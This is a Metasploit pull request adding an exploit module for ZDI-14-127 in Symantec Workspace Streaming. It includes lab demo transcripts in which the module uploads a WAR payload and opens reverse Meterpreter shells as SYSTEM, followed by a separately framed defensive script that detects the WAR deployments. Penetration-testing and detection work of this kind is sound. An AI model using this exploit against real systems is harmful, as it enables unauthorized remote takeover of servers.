Add module for ZDI-14-127 #3364

Merged (1 commit), May 19, 2014

Conversation

jvazquez-r7

Tested successfully on Symantec Workspace Streaming 6.1 SP8 on Windows 2003 SP2. Trial used to be available on Symantec. Not sure if trials for vulnerable versions are available anymore. If you're at r7 and need the installer for testing, just ping me.

Verification

  • Install Symantec Workspace Streaming. Abused services are available in the single machine deployment. If you make a multiple file machine deployment, the backend role includes the abused services.
  • Run the module like in the DEMO, hopefully enjoy sessions

DEMO

  • Against single machine install
msf exploit(symantec_workspace_streaming_exec) > set rhost 172.16.158.154
rhost => 172.16.158.154
msf exploit(symantec_workspace_streaming_exec) > check
[*] 172.16.158.154:9855 - The target appears to be vulnerable.
msf exploit(symantec_workspace_streaming_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.154:9855 - Leaking the jboss deployment directory...
[*] 172.16.158.154:9855 - Building WAR payload...
[*] 172.16.158.154:9855 - Uploading WAR payload...
[*] 172.16.158.154:9832 - Attempting to launch payload in deployed WAR...
[*] 172.16.158.154:9832 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30355 bytes) to 172.16.158.154
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.154:1773) at 2014-05-15 13:40:42 -0500
[+] Deleted ../server/appstream/deploy/YaCu.war

meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer    : juan-6ed9db6ca8
OS          : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.154 - Meterpreter session 2 closed.  Reason: User exit
  • Against backend role
msf exploit(symantec_workspace_streaming_exec) > set rhost 172.16.158.155
rhost => 172.16.158.155
msf exploit(symantec_workspace_streaming_exec) > check
[*] 172.16.158.155:9855 - The target appears to be vulnerable.
msf exploit(symantec_workspace_streaming_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.155:9855 - Leaking the jboss deployment directory...
[*] 172.16.158.155:9855 - Building WAR payload...
[*] 172.16.158.155:9855 - Uploading WAR payload...
[*] 172.16.158.155:9832 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30355 bytes) to 172.16.158.155
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.155:1081) at 2014-05-15 13:40:12 -0500
[+] Deleted ../server/appstream/deploy/azwaRic.war

meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer    : juan-c0de875735
OS          : Windows XP 5.1 (x86)
Meterpreter : java/java
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 172.16.158.155 - Meterpreter session 1 closed.  Reason: User exit
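
A defender-side check built from the artifacts visible in the demo output above (a WAR written to `../server/appstream/deploy/` and deleted again once the session opens), added here as an example and not part of this pull request or the module: it flags WAR files that appear in that directory outside a known baseline, or that are removed shortly after creation. The event tuple format, the five-minute window, the `console.war` baseline name and the `<install-root>` placeholder are assumptions.

```python
from datetime import datetime, timedelta

DEPLOY_DIR = "/server/appstream/deploy"  # directory from the "[+] Deleted ..." lines
WINDOW = timedelta(minutes=5)            # assumed threshold, tune per site


def _war_in_deploy(path):
    """Normalise a Windows or POSIX path; return it only if it is a WAR in the deploy dir."""
    p = path.replace("\\", "/").lower()
    parent, _, name = p.rpartition("/")
    return p if name.endswith(".war") and parent.endswith(DEPLOY_DIR) else None


def find_suspicious_wars(events, baseline=(), window=WINDOW):
    """events: iterable of (datetime, 'create' | 'delete', path) from any file-audit source.
    Returns a sorted list of (normalised_path, reason) pairs."""
    known = {b.lower() for b in baseline}
    created, findings = {}, set()
    for ts, action, path in sorted(events):
        p = _war_in_deploy(path)
        if p is None:
            continue
        name = p.rpartition("/")[2]
        if action == "create":
            created[p] = ts
            if name not in known:
                findings.add((p, "unknown WAR deployed"))
        elif action == "delete" and p in created and ts - created.pop(p) <= window:
            findings.add((p, "WAR deleted shortly after deployment"))
    return sorted(findings)


# Constructed sample events; the install root is a placeholder, not a real path.
T0 = datetime(2014, 5, 15, 13, 40, 0)
ROOT = "C:\\<install-root>"
SAMPLE = [
    (T0, "create", ROOT + "\\server\\appstream\\deploy\\YaCu.war"),
    (T0 + timedelta(seconds=45), "delete", ROOT + "\\server\\appstream\\deploy\\YaCu.war"),
    (T0 - timedelta(days=30), "create", ROOT + "\\server\\appstream\\deploy\\console.war"),
    (T0, "create", ROOT + "\\temp\\report.war"),  # outside the deploy dir, ignored
]

if __name__ == "__main__":
    for path, reason in find_suspicious_wars(SAMPLE, baseline=("console.war",)):
        print(f"{reason}: {path}")
```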

@wchen-r7 wchen-r7 self-assigned this May 16, 2014
@wchen-r7

Task assigned.

@wchen-r7 wchen-r7 merged commit 1b68abe into rapid7:master May 19, 2014
@jvazquez-r7 jvazquez-r7 deleted the symantec_streaming branch November 18, 2014 15:58